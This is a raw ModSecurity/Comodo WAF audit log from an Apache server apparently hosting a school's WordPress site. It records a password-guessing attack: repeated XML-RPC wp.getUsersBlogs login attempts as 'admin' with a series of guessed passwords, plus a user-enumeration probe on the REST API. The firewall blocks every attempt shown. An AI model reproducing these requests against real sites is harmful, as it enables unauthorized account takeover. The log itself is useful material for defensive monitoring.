(phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (30+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067587758594 4897 (- - -) Stopwatch2: 1745067587758594 4897; combined=3321, p1=414, p2=2761, p3=0, p4=0, p5=86, sr=73, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f196851-Z-- --6d5c276e-A-- [19/Apr/2025:20:00:47 +0700] aAOef-vDiFC_ir7MDwbQ1QAAAE0 103.236.140.4 56042 103.236.140.4 8181 --6d5c276e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6d5c276e-C-- wp.getUsersBlogs admin steelers --6d5c276e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d5c276e-E-- --6d5c276e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (15+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067647843393 4066 (- - -) Stopwatch2: 1745067647843393 4066; combined=2744, p1=361, p2=2261, p3=0, p4=0, p5=73, sr=55, sw=49, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d5c276e-Z-- --84215b33-A-- [19/Apr/2025:20:01:48 +0700] aAOevA6cTFSgLAHl7PrDHgAAABQ 103.236.140.4 32928 103.236.140.4 8181 --84215b33-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --84215b33-C-- wp.getUsersBlogs admin Marketing2018_ --84215b33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84215b33-E-- --84215b33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067708158028 5293 (- - -) Stopwatch2: 1745067708158028 5293; combined=3733, p1=476, p2=3040, p3=0, p4=0, p5=126, sr=126, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84215b33-Z-- --56d6894d-A-- [19/Apr/2025:20:02:48 +0700] aAOe-EruoUXZj665VUHikQAAAME 103.236.140.4 37064 103.236.140.4 8181 --56d6894d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --56d6894d-C-- wp.getUsersBlogs admin 999999 --56d6894d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56d6894d-E-- --56d6894d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067768323214 5663 (- - -) Stopwatch2: 1745067768323214 5663; combined=3877, p1=476, p2=3210, p3=0, p4=0, p5=113, sr=104, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56d6894d-Z-- --ab58c658-A-- [19/Apr/2025:20:03:48 +0700] aAOfNHNa4dA2HllpK_NqgQAAAJY 103.236.140.4 41960 103.236.140.4 8181 --ab58c658-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ab58c658-C-- wp.getUsersBlogs admin manager --ab58c658-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab58c658-E-- --ab58c658-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (20+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067828024605 5856 (- - -) Stopwatch2: 1745067828024605 5856; combined=4061, p1=491, p2=3373, p3=0, p4=0, p5=114, sr=86, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab58c658-Z-- --08974a49-A-- [19/Apr/2025:20:04:50 +0700] aAOfcnNa4dA2HllpK_NrqwAAAJE 103.236.140.4 47068 103.236.140.4 8181 --08974a49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --08974a49-C-- wp.getUsersBlogs admin ladybug --08974a49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08974a49-E-- --08974a49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067890495282 6391 (- - -) Stopwatch2: 1745067890495282 6391; combined=4534, p1=599, p2=3731, p3=0, p4=0, p5=119, sr=72, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08974a49-Z-- --9f8ceb4c-A-- [19/Apr/2025:20:05:44 +0700] aAOfqHNa4dA2HllpK_NssQAAAIU 103.236.140.4 51206 103.236.140.4 8181 --9f8ceb4c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.69 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9f8ceb4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f8ceb4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745067944823973 2738 (- - -) Stopwatch2: 1745067944823973 2738; combined=1212, p1=396, p2=783, p3=0, p4=0, p5=32, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f8ceb4c-Z-- --41e02874-A-- [19/Apr/2025:20:05:48 +0700] aAOfrHNa4dA2HllpK_Ns1wAAAIU 103.236.140.4 51474 103.236.140.4 8181 --41e02874-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.69 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --41e02874-C-- demo.sayHello --41e02874-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --41e02874-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067948148104 6014 (- - -) Stopwatch2: 1745067948148104 6014; combined=4699, p1=559, p2=3847, p3=51, p4=72, p5=101, sr=75, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41e02874-Z-- --4126cf17-A-- [19/Apr/2025:20:05:56 +0700] aAOftA6cTFSgLAHl7PrIDwAAAA0 103.236.140.4 52082 103.236.140.4 8181 --4126cf17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4126cf17-C-- wp.getUsersBlogs admin marketing2020_ --4126cf17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4126cf17-E-- --4126cf17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067956209426 5868 (- - -) Stopwatch2: 1745067956209426 5868; combined=4137, p1=503, p2=3435, p3=0, p4=0, p5=114, sr=86, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4126cf17-Z-- --ad178453-A-- [19/Apr/2025:20:06:57 +0700] aAOf8UruoUXZj665VUHnygAAAMc 103.236.140.4 57098 103.236.140.4 8181 --ad178453-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ad178453-C-- wp.getUsersBlogs admin marketing2019 --ad178453-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad178453-E-- --ad178453-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068017873693 5144 (- - -) Stopwatch2: 1745068017873693 5144; combined=3699, p1=441, p2=3041, p3=0, p4=0, p5=125, sr=92, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad178453-Z-- --3e25e570-A-- [19/Apr/2025:20:07:57 +0700] aAOgLXNa4dA2HllpK_NvHQAAAIU 103.236.140.4 33708 103.236.140.4 8181 --3e25e570-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3e25e570-C-- wp.getUsersBlogs admin smkn22-jkt_sch_id --3e25e570-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e25e570-E-- --3e25e570-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068077144605 4524 (- - -) Stopwatch2: 1745068077144605 4524; combined=3408, p1=393, p2=2874, p3=0, p4=0, p5=84, sr=80, sw=57, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e25e570-Z-- --72c2345a-A-- [19/Apr/2025:20:08:58 +0700] aAOgakruoUXZj665VUHqkgAAAMA 103.236.140.4 38646 103.236.140.4 8181 --72c2345a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --72c2345a-C-- wp.getUsersBlogs admin matthew1 --72c2345a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72c2345a-E-- --72c2345a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068138083175 5610 (- - -) Stopwatch2: 1745068138083175 5610; combined=4047, p1=460, p2=3415, p3=0, p4=0, p5=100, sr=87, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72c2345a-Z-- --14be5f60-A-- [19/Apr/2025:20:09:59 +0700] aAOgpw6cTFSgLAHl7PrNNQAAABA 103.236.140.4 43128 103.236.140.4 8181 --14be5f60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 231 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --14be5f60-C-- wp.getUsersBlogs admin smkn22-jkt-sch-id123 --14be5f60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14be5f60-E-- --14be5f60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068199077567 5339 (- - -) Stopwatch2: 1745068199077567 5339; combined=3583, p1=427, p2=2986, p3=0, p4=0, p5=102, sr=83, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14be5f60-Z-- --56448c52-A-- [19/Apr/2025:20:11:04 +0700] aAOg6A6cTFSgLAHl7PrO3QAAAAA 103.236.140.4 48952 103.236.140.4 8181 --56448c52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --56448c52-C-- wp.getUsersBlogs admin q1w2e3r4t5 --56448c52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56448c52-E-- --56448c52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068264144796 15715 (- - -) Stopwatch2: 1745068264144796 15715; combined=24414, p1=428, p2=3052, p3=0, p4=0, p5=10481, sr=78, sw=70, l=0, gc=10383 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56448c52-Z-- --8363db65-A-- [19/Apr/2025:20:12:08 +0700] aAOhKEruoUXZj665VUHuaQAAAM4 103.236.140.4 54928 103.236.140.4 8181 --8363db65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8363db65-C-- wp.getUsersBlogs admin Administrator1234 --8363db65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8363db65-E-- --8363db65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068328370916 4816 (- - -) Stopwatch2: 1745068328370916 4816; combined=3224, p1=390, p2=2688, p3=0, p4=0, p5=87, sr=70, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8363db65-Z-- --95148b3f-A-- [19/Apr/2025:20:13:10 +0700] aAOhZkruoUXZj665VUHvsAAAAMc 103.236.140.4 60682 103.236.140.4 8181 --95148b3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --95148b3f-C-- wp.getUsersBlogs admin zxcvbn --95148b3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95148b3f-E-- --95148b3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (30+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068390416671 4662 (- - -) Stopwatch2: 1745068390416671 4662; combined=3226, p1=413, p2=2662, p3=0, p4=0, p5=89, sr=68, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95148b3f-Z-- --c2207450-A-- [19/Apr/2025:20:14:13 +0700] aAOhpUruoUXZj665VUHwCwAAANI 103.236.140.4 33242 103.236.140.4 8181 --c2207450-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c2207450-C-- wp.getUsersBlogs admin admin098123 --c2207450-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2207450-E-- 